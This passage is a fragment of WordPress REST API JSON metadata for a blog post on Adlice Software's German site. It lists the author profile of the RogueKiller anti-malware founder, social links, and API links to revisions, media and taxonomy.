Software"},"image":{"@id":"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/RogueKiller","https:\/\/x.com\/AdliceSoftware","https:\/\/fr.linkedin.com\/company\/adlice-software","https:\/\/www.youtube.com\/channel\/UC4CQ-gIZMGWxl-auf0QqYhQ"]},{"@type":"Person","@id":"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d","name":"tigzy","image":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.adlice.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g","caption":"tigzy"},"description":"Founder and owner of Adlice Software, Tigzy started as lead developer on the popular Anti-malware called RogueKiller. Involved in all the Adlice projects as lead developer, Tigzy is also doing research and reverse engineering as well as writing blog posts.","url":"https:\/\/www.adlice.com\/de\/author\/tigzy\/"}]}},"_links":{"self":[{"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/posts\/424","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/comments?post=424"}],"version-history":[{"count":1,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/posts\/424\/revisions"}],"predecessor-version":[{"id":4718,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/posts\/424\/revisions\/4718"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/media\/425"}],"wp:attachment":[{"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/media?parent=424"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/categories?post=424"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/tags?post=424"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}